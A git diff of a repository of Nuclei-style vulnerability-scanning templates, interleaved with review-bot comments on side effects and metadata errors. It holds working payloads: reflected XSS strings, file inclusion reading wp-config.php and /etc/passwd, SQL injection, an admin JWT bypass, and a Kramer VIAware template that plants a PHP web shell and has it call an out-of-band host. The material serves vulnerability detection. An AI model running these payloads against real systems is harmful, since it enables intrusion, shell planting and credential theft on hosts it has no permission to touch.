@@ -1,33 +0,0 @@ -id: CVE-2021-35265 -info: - name: MaxSite CMS XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. - reference: - - https://github.com/maxsite/cms/issues/414#issue-726249183 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 - tags: cve,cve2021,maxsite,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-35265 - cwe-id: CWE-79 -requests: - - method: GET - path: - - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-36356(1).yaml b/poc/cve/cve-2021-36356(1).yaml new file mode 100644 index 0000000000..fc0224ed28 --- /dev/null +++ b/poc/cve/cve-2021-36356(1).yaml 
@@ -0,0 +1,35 @@
+id: CVE-2021-36356
+info:
+ name: Kramer VIAware - Remote Code Execution
+ author: gy741
+ severity: critical
+ description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
+ reference:
+ - https://www.exploit-db.com/exploits/50856
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-36356
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
+ - https://write-up.github.io/kramerav/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-36356
+ cwe-id: CWE-434
+ tags: rce,viaware,cve,cve2021,kramer
+requests:
+ - raw:
+ - |
+ POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
+ - |
+ GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1
+ Host: {{Hostname}}
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+# Enhanced by mp on 2022/05/18
diff --git a/poc/cve/cve-2021-37216-6280.yaml b/poc/cve/cve-2021-37216-6280.yaml
deleted file mode 100644
index 168adaeeaa..0000000000
--- a/poc/cve/cve-2021-37216-6280.yaml
+++ /dev/null
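Review bot: The first raw request of the CVE-2021-36356 template writes a PHP file under `/var/www/html/` on the scanned device and nothing in the template removes it, so every host that tests positive is left with a page that runs request-supplied commands. That side effect is undeclared: `tags` has no `intrusive` entry and the description does not mention the file. I would add `intrusive` to `tags`, put a comment above `requests:` such as `# NOTE: leaves {{randstr}}.php in the web root; remove it from the device after testing`, and keep the template out of scheduled scans. The `reference` list also cites CVE-2021-35064, which differs from the template's `cve-id`; say why it is linked or drop it.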
@@ -1,35 +0,0 @@ -id: CVE-2021-37216 -info: - name: QSAN Storage Manager prior to v3.3.3 Reflected XSS - author: dwisiswant0 - description: | - QSAN Storage Manager header page parameters does not filter special characters. - Remote attackers can inject JavaScript without logging in and launch - reflected XSS attacks to access and modify specific data. - reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html - severity: medium - tags: cve,cve2021,xss,qsan,storage - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-37216 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/http_header.php" - headers: - X-Trigger-XSS: "" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"HTTP_X_TRIGGER_XSS":""' - - type: word - part: header - words: - - "text/html" - - type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-xss-protection')" diff --git a/poc/cve/cve-2021-37416(1).yaml b/poc/cve/cve-2021-37416(1).yaml new file mode 100644 index 0000000000..3f2ac17b38 --- /dev/null +++ b/poc/cve/cve-2021-37416(1).yaml 
@@ -0,0 +1,38 @@ +id: CVE-2021-37416 +info: + name: Zoho ManageEngine ADSelfService Plus - Reflected XSS + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ManageEngine" + verified: true + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + tags: cve,cve2021,zoho,xss +requests: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and diff --git a/poc/cve/cve-2021-37580-6292.yaml b/poc/cve/cve-2021-37580-6292.yaml new file mode 100644 index 0000000000..326f01e24f --- /dev/null +++ b/poc/cve/cve-2021-37580-6292.yaml 
@@ -0,0 +1,36 @@
+id: CVE-2021-37580
+info:
+ name: Apache ShenYu Admin JWT - Authentication Bypass
+ author: pdteam
+ severity: critical
+ description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-37580
+ - https://github.com/fengwenhua/CVE-2021-37580
+ - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb
+ - http://www.openwall.com/lists/oss-security/2021/11/16/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-37580
+ cwe-id: CWE-287
+ tags: cve,cve2021,apache,jwt,shenyu
+requests:
+ - raw:
+ - |
+ GET /dashboardUser HTTP/1.1
+ Host: {{Hostname}}
+ X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'query success'
+ - '"userName":"admin"'
+ - '"code":200'
+ condition: and
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/02
diff --git a/poc/cve/cve-2021-38702-6314.yaml b/poc/cve/cve-2021-38702-6314.yaml
new file mode 100644
index 0000000000..cf51a9d3b3
--- /dev/null
+++ b/poc/cve/cve-2021-38702-6314.yaml
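Review bot: The hard-coded `X-Access-Token` in the CVE-2021-37580 request has a payload segment that decodes to `{"userName":"admin","exp":1637265121}`, an expiry in November 2021, so the check can only fire on targets that accept an already-expired token. If affected builds ignore `exp` this still works, but the template does not record that assumption; where it does not hold, the result is a false negative and a clean scan should not be read as "not affected". A comment above the header such as `# fixed sample token, exp is in the past: detection relies on the server not enforcing expiry` would make this visible to whoever interprets the results. The word matcher also has no `part`, so it relies on the default.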
@@ -0,0 +1,34 @@ +id: CVE-2021-38702 + +info: + name: Cyberoam NetGenie XSS + author: geeknik + severity: medium + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. + reference: https://seclists.org/fulldisclosure/2021/Aug/20 + tags: cve,cve2021,cyberoam,netgenie,xss,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-38704-6317.yaml b/poc/cve/cve-2021-38704-6317.yaml deleted file mode 100644 index f6123c5175..0000000000 --- a/poc/cve/cve-2021-38704-6317.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2021-38704 -info: - name: ClinicCases 7.3.3 Reflected Cross-Site Scripting - author: alph4byt3 - severity: medium - description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. - reference: - - https://github.com/sudonoodle/CVE-2021-38704 - - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 - - https://github.com/judsonmitchell/ClinicCases/releases - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-38704 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ClinicCases",html:"/cliniccases/" - tags: xss,cve,cve2021,cliniccases -requests: - - method: GET - path: - - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/cve-2021-38751-6320.yaml b/poc/cve/cve-2021-38751-6320.yaml new file mode 100644 index 0000000000..e44088c6a4 --- /dev/null +++ b/poc/cve/cve-2021-38751-6320.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2021-38751 +info: + name: ExponentCMS <= 2.6 Host Header Injection + author: dwisiswant0 + severity: medium + description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 + - https://github.com/exponentcms/exponent-cms/issues/1544 + - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2021-38751 + cwe-id: CWE-116 + tags: cve,cve2021,exponentcms +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + Host: "{{randstr}}.tld" + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + - 'EXPONENT.PATH' + - 'EXPONENT.URL' + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/cve-2021-39211(1).yaml b/poc/cve/cve-2021-39211(1).yaml new file mode 100644 index 0000000000..0847c7cf42 --- /dev/null +++ b/poc/cve/cve-2021-39211(1).yaml 
@@ -0,0 +1,31 @@
+id: CVE-2021-39211
+info:
+ name: GLPI Telemetry Disclosure
+ author: dogasantos,noraj
+ severity: medium
+ description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-39211
+ - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825
+ - https://github.com/glpi-project/glpi/releases/tag/9.5.6
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-39211
+ cwe-id: CWE-668,CWE-200
+ tags: cve,cve2021,glpi,exposure
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ajax/telemetry.php"
+ - "{{BaseURL}}/glpi/ajax/telemetry.php"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"uuid":'
+ - '"glpi":'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-39226-6323.yaml b/poc/cve/cve-2021-39226-6323.yaml
new file mode 100644
index 0000000000..1bff9d9534
--- /dev/null
+++ b/poc/cve/cve-2021-39226-6323.yaml
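Review bot: The affected range in the CVE-2021-39211 `description` is written `GLPI => 9.2 and < 9.5.6`; `=>` is not a comparison operator, and the intended reading is presumably `GLPI >= 9.2 and < 9.5.6`, which is what someone checking an inventory against this text needs. Both `path` entries are always requested, so an install that answers on both yields two findings; `stop-at-first-match: true` avoids that. The word matcher has no `part` and there is no content-type check, so the match rests on the two JSON keys and the 200 status alone.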
@@ -0,0 +1,30 @@
+id: CVE-2021-39226
+info:
+ name: Grafana Snapshot Authentication Bypass
+ author: Evan Rubinstein
+ description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).
+ remediation: "This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects."
+ reference:
+ - https://github.com/advisories/GHSA-69j6-29vr-p3j9
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-39226
+ severity: critical
+ tags: cve,cve2021,grafana
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2021-39226
+ cwe-id: CWE-200
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/snapshots/:key"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - '"isSnapshot":true'
+
+# Enhanced by cs on 2022/02/22
diff --git a/poc/cve/cve-2021-39312(1).yaml b/poc/cve/cve-2021-39312(1).yaml
deleted file mode 100644
index 02e3b11697..0000000000
--- a/poc/cve/cve-2021-39312(1).yaml
+++ /dev/null
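Review bot: The `remediation` string of the CVE-2021-39226 template lists `/api/snapshots/:key` twice, and the `description` spells the same endpoint `/api/snapshot/:key` while the request probes `/api/snapshots/:key`; anyone copying these paths into reverse-proxy block rules gets an incomplete or wrong list. The text should use one spelling throughout and name each path once. The version statements also disagree: the description says instances "up to 7.5.11" are affected while the remediation says 7.5.11 contains the fix. `cwe-id: CWE-200` next to a 9.8 `C:H/I:H/A:H` vector looks inconsistent for what the title calls an authentication bypass, so both are worth checking against the NVD entry already in `reference`.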
@@ -1,40 +0,0 @@ -id: CVE-2021-39312 -info: - name: WordPress True Ranker <2.2.4 - Local File Inclusion - author: DhiyaneshDK - severity: high - description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. - reference: - - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 - - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php - - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 - remediation: Fixed in version 2.2.4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-39312 - cwe-id: CWE-22,CWE-22 - tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr -requests: - - raw: - - | - POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/poc/cve/cve-2021-41569(1).yaml b/poc/cve/cve-2021-41569(1).yaml deleted file mode 100644 index a65c219ae1..0000000000 --- a/poc/cve/cve-2021-41569(1).yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2021-41569 -info: - name: SAS 9.4 build 1520 - Local File Inclusion - author: 0x_Akoko - severity: high - description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - reference: - - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 - - https://support.sas.com/kb/68/641.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41569 - cwe-id: CWE-829 - tags: cve,cve2021,sas,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-41691-6460.yaml b/poc/cve/cve-2021-41691-6460.yaml deleted file mode 100644 index 8b7aa30835..0000000000 --- a/poc/cve/cve-2021-41691-6460.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-41691 -info: - name: openSIS Student Information System 8.0 SQL Injection - author: Bartu Utku SARP - severity: high - description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. - reference: - - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - - https://www.exploit-db.com/exploits/50637 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 - classification: - cve-id: CVE-2021-41691 - tags: cve,cve2021,opensis,sqli,auth -requests: - - raw: - - | - POST /index.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - USERNAME={{username}}&PASSWORD={{password}}&language=en&log= - - | - POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 - attack: pitchfork - payloads: - username: - - student - password: - - student@123 - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, " + - + condition: or + +# digest: 4a0a00473045022100aa670ea1eb9e839c6b4137d2b9c18582caf4785c1330d4cd45ea719821a3cb2d0220048dc0c167ede9836ccc1f5825e83f7316c440865ab72b6abbe86d5ba8e5189c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/prestashop-detect.yaml b/poc/detect/prestashop-detect.yaml deleted file mode 100644 index d18e4f89a4..0000000000 --- a/poc/detect/prestashop-detect.yaml +++ /dev/null 
@@ -1,22 +0,0 @@ -id: prestashop-detect -info: - name: PrestaShop Tech Detection - author: pdteam - severity: info - tags: tech,cms,prestashop - metadata: - shodan-query: http.component:"PrestaShop" -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 2 - matchers: - - type: regex - part: body - regex: - - Powered by ]+>PrestaShop - - - - - condition: or diff --git a/poc/detect/prometheus-exporter-detect-9674.yaml b/poc/detect/prometheus-exporter-detect-9674.yaml index e0f4bf47fe..c581c3448c 100644 --- a/poc/detect/prometheus-exporter-detect-9674.yaml +++ b/poc/detect/prometheus-exporter-detect-9674.yaml @@ -10,6 +10,8 @@ requests: - method: GET path: - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/detect/prtg-detect-9704.yaml b/poc/detect/prtg-detect-9704.yaml index 71481fbbad..e24606ba47 100644 --- a/poc/detect/prtg-detect-9704.yaml +++ b/poc/detect/prtg-detect-9704.yaml @@ -1,43 +1,31 @@ id: prtg-detect - info: name: Detect PRTG author: geeknik - severity: info description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg - metadata: - max-request: 3 - tags: tech,prtg - -http: + severity: info +requests: - method: GET path: - "{{BaseURL}}/index.htm" - "{{BaseURL}}/prtg/index.htm" - "{{BaseURL}}/PRTG/index.htm" - - stop-at-first-match: true - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - "PRTG Network Monitor" - + condition: and - type: regex part: header regex: - PRTG - extractors: - type: kval part: header kval: - Server - -# digest: 4a0a004730450221009cab3b6f15068a672767bc866ed486c76b5d33eb73c2d94fbcac5306529de6d3022044ea03a8764b767960c65b3be0bd060b7f7e09e5cd4b649170747cb8ffe968e8:922c64590222798bb761d5b6d8e72950 
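Review bot: The `prtg-detect-9704.yaml` hunk removes `stop-at-first-match: true`, so all three `index.htm` paths are requested on every target and a host that answers on more than one produces duplicate findings. It also deletes `tags: tech,prtg`, which takes the template out of any tag-based selection or exclusion. The `# digest:` trailer is dropped too, so the file presumably no longer verifies as a signed template. I would keep the tag line and `stop-at-first-match`, and re-sign after the edit. The added `condition: and` on a matcher with a single word has no effect and can go.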
diff --git a/poc/detect/prtg-detect-9706.yaml b/poc/detect/prtg-detect-9706.yaml deleted file mode 100644 index a5aad5cd3e..0000000000 --- a/poc/detect/prtg-detect-9706.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: prtg-detect -info: - name: Detect PRTG - author: geeknik - description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg - severity: info - tags: tech,prtg -requests: - - method: GET - path: - - "{{BaseURL}}/index.htm" - - "{{BaseURL}}/prtg/index.htm" - - "{{BaseURL}}/PRTG/index.htm" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - "PRTG Network Monitor" - condition: and - - type: regex - part: header - regex: - - PRTG - extractors: - - type: kval - part: header - kval: - - Server diff --git a/poc/detect/puppet-node-manager-detect-9720.yaml b/poc/detect/puppet-node-manager-detect-9720.yaml deleted file mode 100644 index a193423212..0000000000 --- a/poc/detect/puppet-node-manager-detect-9720.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: puppet-node-manager-detect - -info: - name: Puppet Node Manager - author: pussycat0x - severity: info - metadata: - max-request: 1 - fofa-query: 'app="puppet-Node-Manager"' - tags: node,tech - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Puppet Node Manager' - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100c10bf89d4461579a558485f770b2d098f424f8fa717f89d0c1f2c40a24fef518022100d805d1324e6441eb8eed1dae4e4d4bc1fdbc4a5ceb9948a16965a707e3e33a99:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/puppet-node-manager-detect.yaml b/poc/detect/puppet-node-manager-detect.yaml new file mode 100644 index 0000000000..a7dea10e27 --- /dev/null +++ b/poc/detect/puppet-node-manager-detect.yaml 
@@ -0,0 +1,20 @@ +id: puppet-node-manager-detect +info: + name: Puppet Node Manager + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,tech +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Puppet Node Manager' + - type: status + status: + - 200 diff --git a/poc/detect/puppetdb-detect-9717.yaml b/poc/detect/puppetdb-detect-9717.yaml index 31b735ac37..6373cddfa6 100644 --- a/poc/detect/puppetdb-detect-9717.yaml +++ b/poc/detect/puppetdb-detect-9717.yaml @@ -4,13 +4,10 @@ info: name: PuppetDB Detection author: c-sh0 severity: info - reference: - - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version - metadata: - max-request: 1 + reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version tags: puppet,tech,exposure -http: +requests: - method: GET path: - "{{BaseURL}}/pdb/meta/v1/version" @@ -26,15 +23,13 @@ http: words: - 'application/json' - - type: regex + - type: word part: body - regex: - - '"version"\s:\s"([0-9.]+)"' + words: + - '"version"' extractors: - type: regex group: 1 regex: - '"version"\s:\s"([0-9.]+)"' - -# digest: 490a0046304402201d7a8a0bad8c33ec30ff05992c6a17d9ec0d4fcb5b7c3d7dfac23f906c15247602203edcec555882edc5b02d3265bb8c6a79b3edd20c50a6158ced83029c4712bda1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/puppetdb-detect-9718.yaml b/poc/detect/puppetdb-detect-9718.yaml index 73c4e2f59c..7b29c8def5 100644 --- a/poc/detect/puppetdb-detect-9718.yaml +++ b/poc/detect/puppetdb-detect-9718.yaml 
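Review bot: The second `puppetdb-detect-9717.yaml` hunk replaces the body matcher regex `"version"\s:\s"([0-9.]+)"` with the bare word `"version"`, while the extractor below keeps the regex. Any JSON response at that path containing a `version` key now counts as PuppetDB even when the extractor finds no version string, which weakens the detection; I would keep the regex matcher, or state in a comment why the looser match is wanted. The same file also loses its `# digest:` trailer and reverts `http:` to `requests:`. The matcher list starts above the hunk, so how these matchers are combined is not visible here.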
@@ -1,16 +1,15 @@ id: puppetdb-detect info: - name: PuppetDB detection + name: PuppetDB Detection author: c-sh0 - reference: - - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version severity: info - description: PuppetDB detection + reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version tags: puppet,tech,exposure requests: - method: GET path: - "{{BaseURL}}/pdb/meta/v1/version" + matchers-condition: and matchers: - type: status status: @@ -19,6 +18,10 @@ requests: part: header words: - 'application/json' + - type: word + part: body + words: + - '"version"' extractors: - type: regex group: 1 diff --git a/poc/detect/puppetserver-detect-9721.yaml b/poc/detect/puppetserver-detect-9721.yaml index 08ee862fbb..a880089540 100644 --- a/poc/detect/puppetserver-detect-9721.yaml +++ b/poc/detect/puppetserver-detect-9721.yaml @@ -1,35 +1,31 @@ id: puppetserver-detect - info: name: Puppetserver Detection author: c-sh0 + reference: + - https://insinuator.net/2020/09/puppet-assessment-techniques/ severity: info - reference: https://insinuator.net/2020/09/puppet-assessment-techniques/ + description: Puppetserver Detection tags: tech,puppet,exposure - requests: - method: GET path: - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" - matchers-condition: and matchers: - type: status status: - 404 - - type: word part: header words: - "x-puppet-version" case-insensitive: true - - type: word part: body words: - "{{randstr}}" - extractors: - type: kval kval: - - x_puppet_version \ No newline at end of file + - x_puppet_version diff --git a/poc/detect/puppetserver-detect-9722.yaml b/poc/detect/puppetserver-detect-9722.yaml deleted file mode 100644 index 83c9bcabdf..0000000000 --- a/poc/detect/puppetserver-detect-9722.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: puppetserver-detect - -info: - name: Puppetserver Detection - author: c-sh0 - severity: info - reference: - - https://insinuator.net/2020/09/puppet-assessment-techniques/ - metadata: - max-request: 1 - tags: tech,puppet,exposure,intrusive - -http: - - method: GET - path: - - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" - - matchers-condition: and - matchers: - - type: status - status: - - 404 - - - type: word - part: header - words: - - "x-puppet-version" - case-insensitive: true - - - type: word - part: body - words: - - "{{randstr}}" - - extractors: - - type: kval - kval: - - x_puppet_version - -# digest: 4b0a004830460221009da8fdf7d343803bb76c86b36935e485784f03258b9285ef838fe1bddacf115e02210080939b191b4e6ebd534a1d86ad859bd1cf566f2493f8bf5aa4c26768786edf80:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/redmine-cli-detect-9854.yaml b/poc/detect/redmine-cli-detect-9854.yaml new file mode 100644 index 0000000000..da33d15d29 --- /dev/null +++ b/poc/detect/redmine-cli-detect-9854.yaml @@ -0,0 +1,23 @@ +id: redmine-cli-detect +info: + name: Detect Redmine CLI Configuration File + author: geeknik + severity: info + description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ + tags: tech,redmine +requests: + - method: GET + path: + - "{{BaseURL}}/.redmine-cli" + matchers-condition: and + matchers: + - 